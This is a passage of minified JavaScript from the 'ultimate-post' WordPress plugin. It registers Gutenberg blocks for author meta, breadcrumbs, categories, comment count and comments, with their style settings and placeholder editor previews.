Typography","ultimate-post")}},{data:{type:"alignment",key:"authMetaCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{title:__("Avatar","ultimate-post"),depend:"authMetAvatar",include:[{data:{type:"range",key:"authMetAvSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"authMetAvRadius",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Radius","ultimate-post")}},{data:{type:"range",key:"authMetAvSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{title:__("Icon","ultimate-post"),depend:"authMetaIconShow",include:[{data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{data:{type:"icon",key:"authMetaIconStyle",label:__("Style","ultimate-post")}},{data:{type:"range",key:"authMetaIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"authMetaSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{title:__("Label","ultimate-post"),depend:"authMetaLabel",include:[{data:{type:"text",key:"authMetaLabelText",label:__("authMeta Label Text","ultimate-post")}},{data:{type:"color",key:"authMetaLabelColor",label:__("Label Color","ultimate-post")}},{data:{type:"typography",key:"authMetaLabelTypo",label:__("Label Typography","ultimate-post")}},{data:{type:"range",key:"authMetaLabelSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Label Space X","ultimate-post")}}],store:T})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:T}),(0,o.createElement)(i.Mg,{pro:!0,store:T}),(0,o.createElement)(i.iv,{store:T}))),(0,i.dH)()),(0,o.createElement)("div",_,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("span",{className:"ultp-authMeta-count"},w&&""!=f&&a.ZP[f],(0,o.createElement)("div",{className:"ultp-authMeta-avatar"},h&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg",alt:"author img"})),k&&(0,o.createElement)("span",{className:"ultp-authMeta-label"},v),(0,o.createElement)("a",{href:"#",className:"ultp-authMeta-name"},"David Rikson"," ")))))}},5230:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},authMetaIconColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-authMeta-count > .ultp-authMeta-name { color:{{authMetaIconColor}} }"}]},authMetaHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-authMeta-count > .ultp-authMeta-name:hover{color:{{authMetaHoverColor}} }"}]},authMetaTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-authMeta-count .ultp-authMeta-name"}]},authMetAvatar:{type:"boolean",default:!0},authMetaIconShow:{type:"boolean",default:!1},authMetaCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-block-wrapper { text-align: {{authMetaCountAlign}};}"}]},authMetAvSize:{type:"object",default:{lg:"30",unit:"px"},style:[{depends:[{key:"authMetAvatar",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count .ultp-authMeta-avatar > img { width:{{authMetAvSize}}; height:{{authMetAvSize}} }"}]},authMetAvSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"authMetAvatar",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count .ultp-authMeta-avatar > img { margin-right: {{authMetAvSpace}} }"}]},authMetAvRadius:{type:"object",default:{lg:"100",unit:"px"},style:[{depends:[{key:"authMetAvatar",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count .ultp-authMeta-avatar > img { border-radius:{{authMetAvRadius}}; }"}]},authMetaLabel:{type:"boolean",default:!0},authMetaIconStyle:{type:"string",default:"author1",style:[{depends:[{key:"authMetaIconShow",condition:"==",value:!0}]}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"authMetaIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count > svg, {{ULTP}} .ultp-authMeta-count > div > svg { color:{{iconColor}}; color:{{iconColor}}}"}]},authMetaIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"authMetaIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count > svg { width:{{authMetaIconSize}}; height:{{authMetaIconSize}} }"}]},authMetaSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"authMetaIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count > svg { margin-right: {{authMetaSpace}} }"}]},authMetaLabelText:{type:"string",default:"By",style:[{depends:[{key:"authMetaLabel",condition:"==",value:!0}]}]},authMetaLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"authMetaLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-label { color:{{authMetaLabelColor}} }"}]},authMetaLabelTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{depends:[{key:"authMetaLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-label"}]},authMetaLabelSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"authMetaLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-label { margin-right: {{authMetaLabelSpace}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},75574:(e,t,l)=>{"use strict";var o=l(67294),a=l(53905),i=l(5230),n=l(45536);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/author.svg",alt:"Post Author Meta"}),attributes:i.Z,edit:a.Z,save:()=>null})},3592:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,name:l,attributes:u,clientId:d,className:m,attributes:{blockId:g,advanceId:y,bcrumbSeparator:b,bcrumbSeparatorIcon:v,bcrumbName:h,bcrumbRootText:f,currentPostId:k}}=e;(0,n.S)({blockId:g,clientId:d,currentPostId:k,setAttributes:t,checkRef:!1});const w={setAttributes:t,name:l,attributes:u,clientId:d};g&&(0,i.Kh)(u,"ultimate-post/post-breadcrumb",g);const x=p({className:`ultp-block-${g} ${m}`,...y&&{id:y}});return(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"color",key:"breadcrumbColor",label:__("Text Color","ultimate-post")}},{data:{type:"color",key:"breadcrumbLinkColor",label:__("Link Color","ultimate-post")}},{data:{type:"color",key:"bcrumbLinkHoverColor",label:__("Link Hover Color","ultimate-post")}},{data:{type:"typography",key:"bcrumbTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",min:0,max:50,key:"bcrumbSpace",label:__("Space Between Items","ultimate-post")}},{data:{type:"alignment",key:"bcrumbAlign",responsive:!0,label:__("Alignment","ultimate-post"),options:["flex-start","center","flex-end"]}},{data:{type:"toggle",key:"bcrumbName",label:__("Show Single Post Name","ultimate-post")}},{data:{type:"text",key:"bcrumbRootText",label:__("Root Page Name","ultimate-post")}}],store:w}),(0,o.createElement)(a.T,{title:__("Separator","ultimate-post"),depend:"bcrumbSeparator",include:[{data:{type:"select",key:"bcrumbSeparatorIcon",label:__("Separator","ultimate-post"),options:[{value:"dot",label:__("Dot","ultimate-post")},{value:"slash",label:__("Slash","ultimate-post")},{value:"doubleslash",label:__("Double Slash","ultimate-post")},{value:"close",label:__("Close","ultimate-post")},{value:"dash",label:__("Dash","ultimate-post")},{value:"verticalbar",label:__("Vertical Bar","ultimate-post")},{value:"greaterThan",label:__("Greater Than","ultimate-post")},{value:"emptyspace",label:__("Empty","ultimate-post")}]}},{data:{type:"color",key:"bcrumbSeparatorColor",label:__("Separator Color","ultimate-post")}},{data:{type:"range",min:0,max:50,key:"bcrumbSeparatorSize",label:__("Separator Size [px]","ultimate-post")}}],store:w})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:w}),(0,o.createElement)(a.Mg,{pro:!0,store:w}),(0,o.createElement)(a.iv,{store:w}))),(0,a.dH)()),(0,o.createElement)("div",x,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("ul",{className:`ultp-builder-breadcrumb ultp-breadcrumb-${v}`},(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#"},f.length>0?f:"Home")),b&&(0,o.createElement)("li",{className:"ultp-breadcrumb-separator"}),(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#"},"Parents")),h&&(0,o.createElement)(c,null,b&&(0,o.createElement)("li",{className:"ultp-breadcrumb-separator"}),(0,o.createElement)("li",null,"Current Page"))))))}},19030:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},bcrumbSeparator:{type:"boolean",default:!0},breadcrumbColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb li {color:{{breadcrumbColor}}}"}]},breadcrumbLinkColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb li > a{color:{{breadcrumbLinkColor}}}"}]},bcrumbLinkHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb li a:hover {color:{{bcrumbLinkHoverColor}}}"}]},bcrumbTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb li , {{ULTP}} .ultp-builder-breadcrumb li a"}]},bcrumbSpace:{type:"string",default:12,style:[{selector:"{{ULTP}} li:not(.ultp-breadcrumb-separator) {margin: 0 {{bcrumbSpace}}px;}"}]},bcrumbAlign:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb { justify-content:{{bcrumbAlign}}; }"}]},bcrumbName:{type:"boolean",default:!0},bcrumbRootText:{type:"string",default:"Home"},bcrumbSeparatorIcon:{type:"string",default:"dash",style:[{depends:[{key:"bcrumbSeparator",condition:"==",value:!0}]}]},bcrumbSeparatorColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"bcrumbSeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-breadcrumb .ultp-breadcrumb-separator {color:{{bcrumbSeparatorColor}};}"},{depends:[{key:"bcrumbSeparator",condition:"==",value:!0},{key:"bcrumbSeparatorIcon",condition:"==",value:"dot"}],selector:"{{ULTP}} .ultp-builder-breadcrumb .ultp-breadcrumb-separator {background:{{bcrumbSeparatorColor}};}"}]},bcrumbSeparatorSize:{type:"string",default:"",style:[{depends:[{key:"bcrumbSeparatorIcon",condition:"==",value:"dot"},{key:"bcrumbSeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-breadcrumb li.ultp-breadcrumb-separator:after {height:{{bcrumbSeparatorSize}}px; width:{{bcrumbSeparatorSize}}px;}"},{depends:[{key:"bcrumbSeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-breadcrumb li.ultp-breadcrumb-separator:after {font-size:{{bcrumbSeparatorSize}}px;}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},41458:(e,t,l)=>{"use strict";var o=l(67294),a=l(3592),i=l(19030),n=l(88211);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/breadcrumb.svg"}),attributes:i.Z,edit:a.Z,save:()=>null})},52106:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,catLabelShow:v,catLabel:h,catIconShow:f,catIconStyle:k,catSeparator:w,currentPostId:x}}=e,T={setAttributes:t,name:l,attributes:d,clientId:m};(0,s.S)({blockId:y,clientId:m,currentPostId:x,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(d,"ultimate-post/post-category",y);const _=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",initialOpen:!0,include:[{data:{type:"alignment",key:"catAlign",responsive:!0,label:__("Alignment","ultimate-post"),options:["flex-start","center","flex-end"]}},{data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"catColor",label:__("Color","ultimate-post")},{type:"color2",key:"catBgColor",label:__("Background","ultimate-post")},{type:"border",key:"catItemBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"catRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"catHovColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"catBgHovColor",label:__("Hover Background","ultimate-post")},{type:"border",key:"catItemHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"catHoverRadius",label:__("Hover Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}},{data:{type:"typography",key:"catTypo",label:__("Typography","ultimate-post")}},{data:{type:"text",key:"catSeparator",label:__("Separator","ultimate-post")}},{data:{type:"range",key:"catSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Space Between Categories","ultimate-post")}},{data:{type:"dimension",key:"catItemPad",step:1,unit:!0,responsive:!0,label:__("Category Padding","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{initialOpen:!1,title:__("Category Label","ultimate-post"),depend:"catLabelShow",include:[{data:{type:"text",key:"catLabel",label:__("Label Text","ultimate-post")}},{data:{type:"color",key:"catLabelColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"catLabelTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"catLabelSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Label Spacing","ultimate-post")}},{data:{type:"color2",key:"catLabelBgColor",label:__("Background","ultimate-post")}},{data:{type:"border",key:"catLabelBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"catLabelRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"catLabelPad",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{title:__("Category Icon","ultimate-post"),depend:"catIconShow",include:[{data:{type:"icon",key:"catIconStyle",label:__("Select Icon","ultimate-post")}},{data:{type:"color",key:"catIconColor",label:__("Icon Color","ultimate-post")}},{data:{type:"color",key:"catIconHovColor",label:__("Icon Hover Color","ultimate-post")}},{data:{type:"range",key:"catIconSize",min:10,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")}},{data:{type:"range",key:"catIconSpace",min:10,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")}}],store:T})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:T}),(0,o.createElement)(i.Mg,{pro:!0,store:T}),(0,o.createElement)(i.iv,{store:T}))),(0,i.dH)()),(0,o.createElement)("div",_,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-category"},f&&a.ZP[k],v&&(0,o.createElement)("div",{className:"cat-builder-label"},h),(0,o.createElement)("div",{className:"cat-builder-content"},(0,o.createElement)("a",{className:"ultp-category-list",href:"#"},"Dummy Cat1"),w?" "+w:""," ",(0,o.createElement)("a",{className:"ultp-category-list",href:"#"},"Dummy Cat2"),w?" "+w:""," ",(0,o.createElement)("a",{className:"ultp-category-list",href:"#"},"Dummy Cat3"))))))}},88451:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},catLabelShow:{type:"boolean",default:!0},catIconShow:{type:"boolean",default:!0},catColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .cat-builder-content a, {{ULTP}} .cat-builder-content {color:{{catColor}} !important;}"}]},catBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-category-list"}]},catItemBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#e2e2e2",type:"solid"},style:[{selector:"{{ULTP}} .ultp-category-list"}]},catRadius:{type:"object",default:{top:3,right:3,bottom:3,left:3,unit:"px"},style:[{selector:"{{ULTP}} .ultp-category-list { border-radius:{{catRadius}}; }"}]},catHovColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-category .cat-builder-content > a:hover { color:{{catHovColor}} !important; }"}]},catBgHovColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-category-list:hover"}]},catItemHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#323232",type:"solid"},style:[{selector:"{{ULTP}} .ultp-category-list:hover"}]},catHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-category-list:hover { border-radius:{{catHoverRadius}}; }"}]},catTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{selector:"{{ULTP}} .ultp-category-list"}]},catSeparator:{type:"string",default:""},catSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} .ultp-category-list:not(:first-child) {margin-left:{{catSpace}}}"}]},catItemPad:{type:"object",default:{lg:{top:"0",bottom:"0",left:"10",right:"10",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-category-list { padding:{{catItemPad}} }"}]},catAlign:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-category {justify-content:{{catAlign}}}"}]},catLabel:{type:"string",default:"Category : ",style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}]}]},catLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label {color:{{catLabelColor}};}"}]},catLabelTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label"}]},catLabelSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label {margin-right:{{catLabelSpace}}}"}]},catLabelBgColor:{type:"object",default:[],style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label"}]},catLabelBorder:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label"}]},catLabelRadius:{type:"object",default:[],style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label { border-radius:{{catLabelRadius}}; }"}]},catLabelPad:{type:"object",default:{},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label { padding:{{catLabelPad}} }"}]},catIconStyle:{type:"string",default:"",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}]}]},catIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-category svg { color:{{catIconColor}}; color:{{catIconColor}} }"}]},catIconHovColor:{type:"string",default:"",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-category svg:hover { color:{{catIconHovColor}}; color:{{catIconHovColor}} }"}]},catIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-category svg { height:{{catIconSize}}; width:{{catIconSize}} }"}]},catIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-category svg {margin-right:{{catIconSpace}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},1818:(e,t,l)=>{"use strict";var o=l(67294),a=l(52106),i=l(88451),n=l(72927);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/category.svg",alt:"Post Category"}),attributes:i.Z,edit:a.Z,save:()=>null})},24557:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,clientId:d,className:m,attributes:g,attributes:{blockId:y,advanceId:b,commentLabelText:v,commentIconStyle:h,commentLabel:f,commentIconShow:k,currentPostId:w}}=e,x={setAttributes:t,name:l,attributes:g,clientId:d};(0,s.S)({blockId:y,clientId:d,currentPostId:w,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(g,"ultimate-post/post-comment-count",y);const T=c({className:`ultp-block-${y} ${m}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",include:[{data:{type:"toggle",key:"commentLabel",label:__("Enable Prefix","ultimate-post")}},{data:{type:"color",key:"commentColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"commentTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"commentCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post"),options:["flex-start","center","flex-end"]}},{data:{type:"text",key:"commentLabelText",label:__("Text","ultimate-post")}},{data:{type:"group",key:"commentLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")}}],store:x}),(0,o.createElement)(i.T,{title:__("Icon Style","ultimate-post"),depend:"commentIconShow",initialOpen:!0,include:[{data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{data:{type:"icon",key:"commentIconStyle",label:__("Icon Style","ultimate-post")}},{data:{type:"range",key:"commentIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"commentSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:x})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:x}),(0,o.createElement)(i.Mg,{pro:!0,store:x}),(0,o.createElement)(i.iv,{store:x}))),(0,i.dH)()),(0,o.createElement)("div",T,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("span",{className:"ultp-comment-count"},k&&""!=h&&a.ZP[h],(0,o.createElement)("div",null,"12 "),f&&(0,o.createElement)("span",{className:"ultp-comment-label"},v)))))}},22707:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},commentLabel:{type:"boolean",default:!0},commentIconShow:{type:"boolean",default:!0},commentColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-comment-count { color:{{commentColor}} }"}]},commentTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-count"}]},commentCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-comment-count { justify-content: {{commentCountAlign}};}"}]},commentLabelText:{type:"string",default:"comment ",style:[{depends:[{key:"commentLabel",condition:"==",value:!0}]}]},commentLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"commentLabelAlign",condition:"==",value:"before"},{key:"commentLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count .ultp-comment-label {order: -1;margin-right: 5px;}"},{depends:[{key:"commentLabelAlign",condition:"==",value:"after"},{key:"commentLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count .ultp-comment-label {order: unset; margin-left: 5px;}"}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"commentIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count > svg { color:{{iconColor}}; color:{{iconColor}};}"}]},commentIconStyle:{type:"string",default:"commentCount1",style:[{depends:[{key:"commentIconShow",condition:"==",value:!0}]}]},commentIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"commentIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count svg{ width:{{commentIconSize}}; height:{{commentIconSize}} }"}]},commentSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"commentIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count > svg { margin-right: {{commentSpace}} }"},{depends:[{key:"commentIconShow",condition:"==",value:!0},{key:"commentLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-comment-count > svg { margin: {{commentSpace}} } {{ULTP}} .ultp-comment-count .ultp-comment-label {margin: 0px !important;}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},29044:(e,t,l)=>{"use strict";var o=l(67294),a=l(24557),i=l(22707),n=l(30577);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/comment_count.svg",alt:"Post Comment Count"}),attributes:i.Z,edit:a.Z,save:()=>null})},44473:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(31760),s=l(17655);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,layout:v,leaveRepText:h,replyHeading:f,inputLabel:k,cookiesText:w,subBtnText:x,replyText:T,commentCount:_,authMeta:C,authImg:E,cookiesEnable:S,cmntInputText:P,emailInputText:L,nameInputText:I,webInputText:B,inputPlaceHolder:U,currentPostId:M}}=e,A={setAttributes:t,name:l,attributes:d,clientId:m};(0,n.S)({blockId:y,clientId:m,currentPostId:M,setAttributes:t,checkRef:!1}),y&&(0,i.Kh)(d,"ultimate-post/post-comments",y);const H=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(s.Z,{store:A}),(0,a.dH)()),(0,o.createElement)(r.Z,{include:[{type:"layout",key:"layout",pro:!1,tab:!0,label:__("Select Advanced Layout","ultimate-post"),block:"related-posts",options:[{img:"assets/img/layouts/builder/comments/comment1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/builder/comments/comment2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!1},{img:"assets/img/layouts/builder/comments/comment3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!1}]}],store:A}),(0,o.createElement)("div",H,(0,o.createElement)("div",{className:`ultp-block-wrapper ultp-comment-form ultp-comments-${v}`},(0,o.createElement)("div",{className:"ultp-builder-comment-reply"},(0,o.createElement)("div",{className:"ultp-comment-reply-heading"},_&&"05"," ",T),(0,o.createElement)("ul",{className:"ultp-comment-wrapper ultp-builder-comment-reply"},(0,o.createElement)("li",null,(0,o.createElement)("div",{className:"ultp-comment-content-heading"},E&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null,"Christopher Timmons"),C&&(0,o.createElement)("span",null," ",'July 19, 2021 at 3:45 PM"'," "))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci 